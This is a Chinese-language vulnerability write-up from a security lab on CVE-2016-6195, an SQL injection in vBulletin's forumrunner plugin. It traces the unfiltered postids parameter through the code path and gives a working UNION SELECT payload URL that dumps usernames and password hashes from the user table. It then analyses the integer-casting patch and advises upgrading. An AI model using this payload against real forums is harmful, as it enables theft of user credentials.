VBulletin 核心插件 forumrunner SQL注入(CVE-2016-6195)漏洞分析
Author: janes(知道创宇404安全实验室)
Date: 2016-11-15
漏洞概述
漏洞简介
vBulletin 是一个商业论坛程序,使用PHP语言编写,有研究者发现VBulletin核心插件forumrunner存在SQL注入漏洞: CVE-2016-6195. 插件forumrunner默认开启, 利用该漏洞,攻击者能够利用SQL注入漏洞脱库。
漏洞影响
攻击者能够利用SQL注入漏洞脱库
影响版本
3.6.x ~ 4.2.1
4.2.2 ~ 4.2.2 Patch Level 5
4.2.3 ~ 4.2.3 Patch Level 1
漏洞分析
分析所用版本
4.2.1
漏洞的本质是forumrunner/includes/moderation.php文件中, do_get_spam_data()函数()对参数postids和threadid过滤不严导致SQL注入漏洞, 核心代码如下:
function do_get_spam_data (){ global $vbulletin, $db, $vbphrase; $vbulletin->input->clean_array_gpc('r', array( 'threadid' => TYPE_STRING, 'postids' => TYPE_STRING, )); ... }else if ($vbulletin->GPC['postids'] != '') { $postids = $vbulletin->GPC['postids']; $posts = $db->query_read_slave(" SELECT post.postid, post.threadid, post.visible, post.title, post.userid, thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid FROM " . TABLE_PREFIX . "post AS post LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid) WHERE postid IN ($postids) ");
VBulletin程序中并不直接使用$_GET等全局变量获取输入数据,而是使用clean_gpc() 和 clean_array_gpc() 函数来过滤输入数据,而这两个函数并未对STRING类型做严格过滤,而传入的参数postids是作为SRING类型解析,参数postids随后拼接在SQL语句中进行查询,导致SQL注入漏洞。
寻找调用或包含do_get_spam_data()函数的代码,发现forumrunner/support/common_methods.php
'get_spam_data' => array( 'include' => 'moderation.php', 'function' => 'do_get_spam_data', ),
继续回溯,发现forumrunner/request.php文件包含support/common_methods.php.
... $processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING)); if (!$processed['cmd']) { return; } ... require_once(MCWD . '/support/common_methods.php'); ... if (!isset($methods[$processed['cmd']])) { json_error(ERR_NO_PERMISSION); } if ($methods[$processed['cmd']]['include']) { require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']); } if (isset($_REQUEST['d'])) { error_reporting(E_ALL); } $out = call_user_func($methods[$processed['cmd']]['function']); ...
上面代码中process_input()函数(forumrunner/support/utils.php), 会从$_REQUEST中取值,进行简单的类型转换,STRING类型则原样返回,根据上面代码,可以通过$_REQUEST['cmd']参数调用get_spam_data()函数, 进而调用do_get_spam_data()函数。设置$_REQUEST['d']参数将打开错误报告,有助于SQL注入,当然也可以不设置$_REQUEST['d']参数,这对触发SQL注入漏洞没有影响。剩下的就是使用postids参数构造SQL payload
postids参数注入
payload: forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+
设置断点及变量取值,注入结果如下:
从图中可以看出SQL注入语句执行成功,$post['title']变量已经获取了用户名和密码,其中forumid设置为1, 保证下面代码不会进入if条件判断语句中。
while ($post = $db->fetch_array($posts)) { $forumperms = fetch_permissions($post['forumid']); if ( !($forumperms & $vbulletin->bf_ugp_forumpermissions['canview']) OR !($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads']) OR (!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid']) ) { json_error(ERR_NO_PERMISSION); }
补丁分析
includes/general_vb.php文件, fr_clean_ids函数对id类变量进行了整数转换,从而阻止SQL注入攻击。
function fr_clean_ids($list = ”) { $arr = explode(‘,’,$list); $cleanarr = array_map(‘intval’,$arr); return implode(‘,’,$cleanarr); }
forumrunner/include/moderation.php文件, do_get_spam_data函数过滤$postids和$threadid 参数
$vbulletin->GPC[‘postids’] = fr_clean_ids($vbulletin->GPC[‘postids’]);
...
if ($vbulletin->GPC[‘threadid’] != ”) {
$threadids = $vbulletin->GPC[‘threadid’];
$threadids = fr_clean_ids($threadids);
...
修复方案
-
更新VBulletin程序版本(>4.2.3)
reference
https://www.seebug.org/vuldb/ssvid-92354
https://enumerated.wordpress.com/2016/07/11/1/
http://blog.securelayer7.net/vbulletin-sql-injection-exploit-cve-2016-6195/